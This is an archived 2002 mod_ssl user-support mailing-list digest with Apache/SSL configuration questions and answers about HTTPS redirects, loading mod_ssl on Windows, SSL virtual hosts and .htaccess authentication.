Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Jul 28 14:46:20 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA02912; Sun, 28 Jul 2002 14:45:29 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id OAA02846; Sun, 28 Jul 2002 14:44:57 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 05CF24CE744; Sun, 28 Jul 2002 14:14:20 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 228B5285D1; Sun, 28 Jul 2002 13:05:18 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from maho3msx2.isus.emc.com id LAA12317; Sun, 28 Jul 2002 11:34:39 +0200 (MET DST)
From: novozhilov_sasha@emc.com
Received: by MAHO3MSX2 with Internet Mail Service (5.5.2653.19)
	id ; Sat, 27 Jul 2002 19:48:02 -0400
Message-ID: <6335CBB2F69AD411AD3100D0B7BA38E30A8EC543@CORPUSMX2>
To: modssl-users@modssl.org
Subject: switching http requests to https
Date: Sat, 27 Jul 2002 19:48:01 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: novozhilov_sasha@emc.com
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi.

I need to be able to transparently (to the user) switch user's http requests
to https. Meaning when the user opens a browser and types
"http://server/resourse" I need to recognize that the request came in as
http and need to instruct the browser to resend it as
"https://server/resourse". Ideally I'd like to accomplish that via some
mod_perl script, but if there is a configuration directive, that would work
too.
I'd appreciate any help regarding how to accomplish this.

thanks a lot,
Sasha Novozhilov
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Jul 28 16:16:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA14288; Sun, 28 Jul 2002 16:09:08 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from partyticket.net id QAA14107; Sun, 28 Jul 2002 16:07:28 +0200 (MET DST)
Received: from partyticket.net (localhost [127.0.0.1])
	by partyticket.net (Postfix) with ESMTP id EBC4268077
	for ; Sun, 28 Jul 2002 15:13:48 +0200 (CEST)
Message-ID: <3D43FA88.8000902@partyticket.net>
Date: Sun, 28 Jul 2002 16:07:04 +0200
From: Flemming Frandsen 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.0) Gecko/20020529
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: switching http requests to https
References: <6335CBB2F69AD411AD3100D0B7BA38E30A8EC543@CORPUSMX2>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Flemming Frandsen 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

novozhilov_sasha@emc.com wrote:

> I need to be able to transparently (to the user) switch user's http requests
> to https. Meaning when the user opens a browser and types
> "http://server/resourse" I need to recognize that the request came in as
> http and need to instruct the browser to resend it as
> "https://server/resourse".

Ah, that's simple, just set the Location header, this is what is known 
as an external redirect and it works nicely for doing what you want:
$r->cgi_header_out("Location", "https://yaddayadda")

HTH

-- 
  Regards Flemming Frandsen - http://dion.swamp.dk
  PartyTicket.Net co founder & Yet Another Perl Hacker

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Jul 28 20:48:16 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA18809; Sun, 28 Jul 2002 20:48:03 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from web20506.mail.yahoo.com id UAA18537; Sun, 28 Jul 2002 20:46:36 +0200 (MET DST)
Message-ID: <20020728181953.8318.qmail@web20506.mail.yahoo.com>
Received: from [12.236.247.82] by web20506.mail.yahoo.com via HTTP; Sun, 28 Jul 2002 11:19:53 PDT
Date: Sun, 28 Jul 2002 11:19:53 -0700 (PDT)
From: David W 
Subject: Re: Apache & Mod_SSL Cannot load /modules/mod_ssl.so
To: modssl-users@modssl.org
In-Reply-To: <000b01c233bf$5704aed0$eb00a8c0@ATec.local>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: David W 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hopefully I'm not duplicating someone else's response,
but I think your answer can be found by searching the
archives.  It looks like you didn't copy the openssl
dlls into your c:\winnt\system32 directory.  You need:
libeay32.dll
ssleay32.dll

-david

--- Oliver Enders  wrote:
> Hello ervebody,
> 
> I´ve got the following problem:
> 
> I´ve installed a apache_1.3.23 with OpenSSL, mod_ssl
> and mod_jk with WIN 2000 everything works fine when
> the LoadModule for mod_ssl is commented out. After
> including the LoadModule line, i get the following
> Syntax Error:
> 
> Syntax error on line 195 of
> c:/ptc/apache/conf/httpd.conf:
> Cannot load /modules/mod_ssl.so into server: (126)
> Das angegebene Modul wurde nicht gefunden:
> 
> (Module couldnt be found) 
> 
> But it is the definately there !!
> 
> I´ve allready set the PATH  in the system variables
> to /apache/conf/ because i thought that might be the
> problem, but the path in the Error-message is
> absoloute, so it cant be...... 
> 
> Has anybody had/solved the same problems ??
> 
> Thanx a lot 
> 
> Oliver


__________________________________________________
Do You Yahoo!?
Yahoo! Health - Feel better, live better
http://health.yahoo.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Jul 28 20:51:17 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA19342; Sun, 28 Jul 2002 20:50:46 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mhub.AXP.MDX.AC.UK id UAA19148; Sun, 28 Jul 2002 20:49:40 +0200 (MET DST)
Received: from CONVERSION-DAEMON.mdx.ac.uk by mdx.ac.uk (PMDF V6.1-1 #38636)
 id <01KKN22MR1F4000WPN@mdx.ac.uk> for modssl-users@modssl.org; Sun,
 28 Jul 2002 19:49:06 +0100 (BST)
Received: from mdx-cpq-temp1.nw.mdx.ac.uk ([158.94.52.12])
 by mdx.ac.uk (PMDF V6.1-1 #38636) with ESMTP id <01KKN22L5IBG0017AB@mdx.ac.uk>
 for modssl-users@modssl.org; Sun, 28 Jul 2002 19:49:04 +0100 (BST)
Received: from MDX-CPQ-TEMP1/SpoolDir by mdx-cpq-temp1.nw.mdx.ac.uk
 (Mercury 1.48); Sun, 28 Jul 2002 19:44:58 +0000
Received: from SpoolDir by MDX-CPQ-TEMP1 (Mercury 1.48); Sun,
 28 Jul 2002 19:44:56 +0000
Date: Sun, 28 Jul 2002 19:44:56 +0000
From: a.moon@mdx.ac.uk
Subject: Re: Apache & Mod_SSL Cannot load /modules/mod_ssl.so
To: modssl-users@modssl.org
Message-id: <110F8E217A9@mdx-cpq-temp1.nw.mdx.ac.uk>
Content-transfer-encoding: 7BIT
X-Autoreply-From: 
X-Comment: Middlesex University has scanned this message for viruses.
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: a.moon@mdx.ac.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I am away from the office until the Monday 5th August 2002 

I will get back to you as soon as i can on my return.

If it's an urgent Online Learning Support Unit / Web/ MUBSWEB/ MUBS Online matter
that requires urgent attention then  please contact either  Sanjay1 or Jeff1
who should be able to help.

All the best 
Alex
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Jul 28 21:39:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA29900; Sun, 28 Jul 2002 21:38:53 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from maila.telia.com id VAA29646; Sun, 28 Jul 2002 21:37:59 +0200 (MET DST)
Received: from d1o900.telia.com (d1o900.telia.com [213.66.140.241])
	by maila.telia.com (8.12.5/8.12.5) with ESMTP id g6SJbvl5020383;
	Sun, 28 Jul 2002 21:37:57 +0200 (CEST)
X-Original-Recipient: modssl-users@modssl.org
Received: from DANALIEN (h43n3fls22o900.telia.com [213.65.205.43])
	by d1o900.telia.com (8.10.2/8.10.1) with ESMTP id g6SJbud14726;
	Sun, 28 Jul 2002 21:37:56 +0200 (CEST)
Message-Id: <200207281937.g6SJbud14726@d1o900.telia.com>
From: "Danalien" 
To: "modssl-users@modssl.org" ,
        "novozhilov_sasha@emc.com" 
Date: Sun, 28 Jul 2002 21:37:54 +0200
X-Mailer: PMMail 2000 Professional (2.20.2502) For Windows 2000 (5.0.2195;2)
In-Reply-To: <6335CBB2F69AD411AD3100D0B7BA38E30A8EC543@CORPUSMX2>
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Subject: Re: switching http requests to https
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Danalien" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


There is a very simple approach, using the rewrite directive.
(forwarding it a other https server or virtualhost of yours.

I'm actively using:
	redirect / https://www..com/

You can put in the-main-conf or in a VirtualHost, 

Example:
(I don't use http, only https, so I've made a VH for http to forward to https)

:80>
	SSLEngine Off
	port 80
	redirect / https://www..com/	
	ServerName	www..com
	ServerAdmin	@.com
	ErrorLog logs/dummy-www..com-error_log
	CustomLog logs/dummy-www..com-access_log common





>Hi.
>
>I need to be able to transparently (to the user) switch user's http requests
>to https. Meaning when the user opens a browser and types
>"http://server/resourse" I need to recognize that the request came in as
>http and need to instruct the browser to resend it as
>"https://server/resourse". Ideally I'd like to accomplish that via some
>mod_perl script, but if there is a configuration directive, that would work
>too.
>I'd appreciate any help regarding how to accomplish this.
>
>thanks a lot,
>Sasha Novozhilov
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org





//   with regards
//   ID ::  danalien  ::  

PGP Public Key Fingerprint: C891 D3A1 427A A5E7  449F B19E 1E85 A109

-----BEGIN PGP SIGNATURE-----
Version: PGPsdk version 1.7.1 (C) 1997-1999 Network Associates, Inc. and its affiliated companies.

iQA/AwUBPUQ6Ax6FoQlEaqKIEQLNEwCgxsmRowh0I3AsXohIgTMjbNGdKwMAoOoz
73h9KA46NCgUVl9W9UPdsCpX
=Aa9m
-----END PGP SIGNATURE-----


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Jul 28 22:12:34 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA07043; Sun, 28 Jul 2002 22:05:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mailf.telia.com id WAA06786; Sun, 28 Jul 2002 22:03:50 +0200 (MET DST)
Received: from d1o900.telia.com (d1o900.telia.com [213.66.140.241])
	by mailf.telia.com (8.12.5/8.12.5) with ESMTP id g6SK3hXT002361;
	Sun, 28 Jul 2002 22:03:43 +0200 (CEST)
X-Original-Recipient: modssl-users@modssl.org
Received: from DANALIEN (h43n3fls22o900.telia.com [213.65.205.43])
	by d1o900.telia.com (8.10.2/8.10.1) with ESMTP id g6SK3Qd24428;
	Sun, 28 Jul 2002 22:03:26 +0200 (CEST)
Message-Id: <200207282003.g6SK3Qd24428@d1o900.telia.com>
From: "Danalien" 
To: "modssl-users@modssl.org" ,
        "Jay States" 
Date: Sun, 28 Jul 2002 22:03:25 +0200
X-Mailer: PMMail 2000 Professional (2.20.2502) For Windows 2000 (5.0.2195;2)
In-Reply-To: <31AA9A68-A0E5-11D6-96F8-0003935770DE@mac.com>
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Subject: Re: Virtual Hosting Problem
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Danalien" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

hi.

As I know, you can only bind one uniqe ip to one SSL virtual host.

and from what I have read, you can't use name-based SSL virtual host(s) either,
as a work around.




please correct me if I'm misstaking, anyone, I am only using 1.3.24.

>
>I have tried to configure a port-based virtual hosts with the following 
>ports:
>
>443
>444
>445
>446
>447
>
>Is there a better how-to than on the apache site?  I'm using apache 
>2.0.39 and would like to see an example.  I follow the text and keep 
>getting the same error message.  Keep in mind that port is not used by 
>anything other than apache.
>
>(48)Address already in use: make_sock: could not bind to address [::]:447
>no listening sockets available, shutting down
>
>Thanks in advance.
>
>J
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org





//   with regards
//   ID ::  danalien  ::  

PGP Public Key Fingerprint: C891 D3A1 427A A5E7  449F B19E 1E85 A109

-----BEGIN PGP SIGNATURE-----
Version: PGPsdk version 1.7.1 (C) 1997-1999 Network Associates, Inc. and its affiliated companies.

iQA/AwUBPUQ//h6FoQlEaqKIEQK8ZACeMM07biD1FPAyCWWlqcnPeNb4E8cAoK6s
GOZZ9Zo6ZUvRDv9P4S0IV3sJ
=R1z6
-----END PGP SIGNATURE-----


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 29 09:05:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA15291; Mon, 29 Jul 2002 09:04:21 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns0a.swx.com id JAA15040; Mon, 29 Jul 2002 09:03:38 +0200 (MET DST)
Received: from gate0a.unix.swx.ch (gate0a [192.168.252.17])
	by ns0a.swx.com (8.9.3+Sun/8.9.3) with ESMTP id JAA16426
	for ; Mon, 29 Jul 2002 09:03:24 +0200 (MEST)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0a.unix.swx.ch (8.9.3+Sun/8.9.3) with ESMTP id JAA05768
	for ; Mon, 29 Jul 2002 09:03:23 +0200 (MEST)
X-Authentication-Warning: gate0a.unix.swx.ch: iscan owned process doing -bs
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Subject: RE: Virtual Hosting Problem
content-class: urn:content-classes:message
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
Date: Mon, 29 Jul 2002 09:03:22 +0200
Message-ID: <14D1193E30E0894D8A773957C0AEE24AAA8BF7@SOMEXEVS001.ex.ordersx.org>
Thread-Topic: Virtual Hosting Problem
Thread-Index: AcI2cz233EyZ0A/XRIO8OYt0IVDWNgAWc80w
From: "Boyle Owen" 
To: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id JAA15222
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

>From: Danalien [mailto:danalien@datormaffian.com]
>
>As I know, you can only bind one uniqe ip to one SSL virtual host.

not quite - see below..

>and from what I have read, you can't use name-based SSL 
>virtual host(s) either,
>as a work around.

Mostly right, but with one privisio: You cannot do name-based VHs with SSL but you can have many SSL port-based VHs on ONE IP address..

To understand why - Because in SSL the contents of the TCP/IP packets are encrypted, you can only use external TCP/IP attributes (i.e. IP address and port number) to route the packets. For name-based VHing, you need access to the Host header which is an HTTP attribute (i.e. it is inside the TCP/IP packet). This is visible in plain HTTP but not visible in SSL.

>
>>(48)Address already in use: make_sock: could not bind to 
>address [::]:447
>>no listening sockets available, shutting down

This usually means that some other process is already using port 447. Check /etc/services for a list of pre-defined ports, also verify that you have completely killed all other instances of apache which may have been blocking the port (ps -ef ¦ grep httpd).

Rgds,

Owen Boyle
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 29 13:36:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA07029; Mon, 29 Jul 2002 13:35:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id NAA06974; Mon, 29 Jul 2002 13:34:24 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 4F2FA4CE754; Mon, 29 Jul 2002 13:34:23 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 16C5C28693; Mon, 29 Jul 2002 13:14:44 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from localhost id MAA01201; Mon, 29 Jul 2002 12:29:25 +0200 (MET DST)
Date: Mon, 29 Jul 2002 12:29:25 +0200 (MET DST)
Message-Id: <200207291029.MAA01201@opensource.ee.ethz.ch>
From: modssl-bugdb@modssl.org
To: modssl-users@modssl.org
Subject: [BugDB] SSL_connect:error in SSLv2/v3 read server hello A (PR#738)
Cc: modssl-bugdb@modssl.org
X-Loop: modssl-bugdb@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: modssl-bugdb@modssl.org
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Full_Name: Keith Mastin
Version: mod_ssl-2.8.5-3
OS: Redhat 7.2
Submission from: (NULL) (216.138.194.32)


The webserver has a site http:www.mcleodlake.com that I configured ssl with a
document root directory of mcleodlake.com/webmail/, where I have squirrelmail
running. I want the login process for squirrelmail to be encrypted. The
login.php file is mcleodlake.com/webmail/src/login.php.
Sometimes the server cannot find the login.php file, and sometimes it can, but
does not open the file under https, instead it always opens it under http.
I did a debug:

[root@laird1 html]# openssl s_client -connect localhost:443 -state -debug
CONNECTED(00000003)
SSL_connect:before/connect initialization
write to 0814D6D0 [0184D718] (124 bytes => 124 (0x7C))
0000 - 80 7a 01 03 01 00 51 00-00 00 20 00 00 16 00 00  
.z....Q... .....
0010 - 013 00 00 0a 07 00 c0 00-00 66 00 00 05 00 00 04 .........f......
0020 - 03 00 80 01 00 80 08 00-80 00 00 65 00 00 64 00  ...........e..d.
0030 - 00 63 00 00 62 00 00 61-00 00 60 00 00 15 00 00
.c..b..a..`.....
0040 - 12 00 00 09 06 00 40 00-00 14 00 00 11 00 00 08
......@.........
0050 - 00 00 06 00 00 03 04 00-80 02 00 80 5c 9a 76 a0
............\.v.
0060 - d7 67 cc 16 77 1b 0d 93-8a 85 cc b9 ce b5 fe 46
.g..w..........F
0070 - 76 b8 ab 8b d9 db 2f 09-3e 98 b4 84
v...../.>...
SSL_connect:SSLv2/v3 write client hello A
read from 0814D6D0 [08152C79] (7 bytes => 7 (0x7))
0000 -03c 21 44 4f 43 54 59                              
	from ws3-2.us4.outblaze.com id OAA08544; Mon, 29 Jul 2002 14:01:25 +0200 (MET DST)
Received: (qmail 19568 invoked by uid 1001); 29 Jul 2002 12:01:18 -0000
Message-ID: <20020729120118.19567.qmail@email.com>
Content-Type: text/plain; charset="iso-8859-1"
Content-Disposition: inline
Content-Transfer-Encoding: 7bit
MIME-Version: 1.0
X-Mailer: MIME-tools 5.41 (Entity 5.404)
Received: from [194.152.93.186] by ws3-2.us4.outblaze.com with http for
    michaelob@email.com; Mon, 29 Jul 2002 07:01:18 -0500
From: "Michael O'Brien" 
To: modssl-users@modssl.org
Date: Mon, 29 Jul 2002 07:01:18 -0500
Subject: modssl and htaccess
X-Originating-Ip: 194.152.93.186
X-Originating-Server: ws3-2.us4.outblaze.com
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Michael O'Brien" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

I am running apache 1.3.23 with modssl. I have setup a htaccess file in a directory, but it isn't being picked up. I have set the 
                             
                       
    Options FollowSymLinks          
    AllowOverride AuthConfig        
   

I seem to remember that I might have to set somthing in the SSL options in the virtual host section of my httpd.conf 

Can anyone suggest some possible cause to why my htaccess file is being ignored. The contents of my htaccess file is


AuthUserFile /apps/apache/bin/.htpasswd     
AuthGroupFile /dev/null                     
AuthName "Restricted Site"                  
AuthType Basic                              
                                            
                            
require valid-user
                                    
          
Thanks in advance for any suggestions that you can provide

cheers
Mike           
                                    
-- 
__________________________________________________________
Sign-up for your own FREE Personalized E-mail at Mail.com
http://www.mail.com/?sr=signup

Get 4 DVDs for $.49 cents! plus shipping & processing. Click to join.
http://adfarm.mediaplex.com/ad/ck/990-1736-3566-59

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 29 14:39:25 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA10672; Mon, 29 Jul 2002 14:38:30 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns0b.swx.com id OAA10624; Mon, 29 Jul 2002 14:37:36 +0200 (MET DST)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
	by ns0b.swx.com (8.9.3+Sun/8.9.3) with ESMTP id OAA04070
	for ; Mon, 29 Jul 2002 14:37:35 +0200 (MEST)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.9.3+Sun/8.9.3) with ESMTP id OAA11817
	for ; Mon, 29 Jul 2002 14:37:35 +0200 (MEST)
X-Authentication-Warning: gate0b.unix.swx.ch: iscan owned process doing -bs
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Subject: RE: modssl and htaccess
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
Date: Mon, 29 Jul 2002 14:37:34 +0200
Message-ID: <14D1193E30E0894D8A773957C0AEE24AAA8BFC@SOMEXEVS001.ex.ordersx.org>
Thread-Topic: modssl and htaccess
Thread-Index: AcI2+ATJCz3LmiEaT4SXR5zqPKknzQAA5FoA
From: "Boyle Owen" 
To: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id OAA10663
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

>From: Michael O'Brien [mailto:michaelob@email.com]
>
>Can anyone suggest some possible cause to why my htaccess file 
>is being ignored. The contents of my htaccess file is
>
>
>AuthUserFile /apps/apache/bin/.htpasswd     
>AuthGroupFile /dev/null                     
>AuthName "Restricted Site"                  
>AuthType Basic                              
>                                            
>                            
>require valid-user
>                                    

AuthUserFile is supposed to point at the file containing your usernames and passwords. Did you really do:

cd /apps/apache/bin
./htpasswd -c .htpasswd username

when you were making your password file? (i.e. why call a password file nearly the same as the binary that made it and put it in a bin directory?) I usually have things like:

AuthUserFile /home/site/admin/passwords/member_section.pwd

Which is a whole lot less confusing...

Anyway: Is your "htaccess" file really called "htaccess"? Is so, do you have:

AccessFileName htaccess

because the default is ".htaccess" and "htaccess" will not work on its own (all these leading dots are part of the filename, remember).

Otherwise, check the error log and post the results.

Rgds,

Owen Boyle

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 29 14:49:52 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA11458; Mon, 29 Jul 2002 14:48:26 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from cpemail1.silverbacktech.com id OAA11403; Mon, 29 Jul 2002 14:47:38 +0200 (MET DST)
Received: from kashmir.silverbacktech.com (kashmir [38.151.210.37])
	by cpemail1.silverbacktech.com (8.11.6/8.11.6) with ESMTP id g6TClWD03918
	for ; Mon, 29 Jul 2002 08:47:32 -0400
Received: by kashmir.silverbacktech.com with Internet Mail Service (5.5.2653.19)
	id ; Mon, 29 Jul 2002 08:39:11 -0400
Message-ID: 
From: Noah White 
To: "'modssl-users@modssl.org'" 
Subject: RE: Apache & Mod_SSL Cannot load /modules/mod_ssl.so
Date: Mon, 29 Jul 2002 08:39:02 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id OAA11430
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Noah White 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


You can do that or you can put the path to your OPENSSL's bin directory in
your PATH environment variable and start the server under that environment.

-Noah


> -----Original Message-----
> From: David W [mailto:dkw9992@yahoo.com]
> Sent: Sunday, July 28, 2002 2:20 PM
> To: modssl-users@modssl.org
> Subject: Re: Apache & Mod_SSL Cannot load /modules/mod_ssl.so
> 
> Hopefully I'm not duplicating someone else's response,
> but I think your answer can be found by searching the
> archives.  It looks like you didn't copy the openssl
> dlls into your c:\winnt\system32 directory.  You need:
> libeay32.dll
> ssleay32.dll
> 
> -david
> 
> --- Oliver Enders  wrote:
> > Hello ervebody,
> >
> > I´ve got the following problem:
> >
> > I´ve installed a apache_1.3.23 with OpenSSL, mod_ssl
> > and mod_jk with WIN 2000 everything works fine when
> > the LoadModule for mod_ssl is commented out. After
> > including the LoadModule line, i get the following
> > Syntax Error:
> >
> > Syntax error on line 195 of
> > c:/ptc/apache/conf/httpd.conf:
> > Cannot load /modules/mod_ssl.so into server: (126)
> > Das angegebene Modul wurde nicht gefunden:
> >
> > (Module couldnt be found)
> >
> > But it is the definately there !!
> >
> > I´ve allready set the PATH  in the system variables
> > to /apache/conf/ because i thought that might be the
> > problem, but the path in the Error-message is
> > absoloute, so it cant be......
> >
> > Has anybody had/solved the same problems ??
> >
> > Thanx a lot
> >
> > Oliver
> 
> 
> __________________________________________________
> Do You Yahoo!?
> Yahoo! Health - Feel better, live better
> http://health.yahoo.com
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 29 18:27:02 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA26181; Mon, 29 Jul 2002 18:25:25 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from smtp25.baruch.cuny.edu id SAA26168; Mon, 29 Jul 2002 18:24:50 +0200 (MET DST)
Received: (qmail 18387 invoked by uid 0); 29 Jul 2002 16:23:57 -0000
Received: from unknown (HELO 8wpkx01.mindspring.com) (150.210.151.45)
  by smtp25.baruch.cuny.edu with SMTP; 29 Jul 2002 16:23:57 -0000
Message-Id: <5.0.2.1.0.20020729122335.00a1a720@pop.mindspring.com>
X-Sender: choepete@pop.mindspring.com
X-Mailer: QUALCOMM Windows Eudora Version 5.0.2
Date: Mon, 29 Jul 2002 12:24:19 -0400
To: modssl-users@modssl.org
From: Peter Choe 
Subject: simple question
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Peter Choe 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

i am very new to mod_ssl. i am trying to figure out how to set up some
specific directories to accept ssl connection. i have looked at the
documentation and the mail archives, but was unable to decpiher how to do this.
when i look at the httpd.conf file, i saw a documentroot specifing the root
directory of my webserver. if i changed that to a directory below, it
doesn't seem to affect whether or not the root document is no longer ssl
enable.

any help would be appreciated.


Peter Choe

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

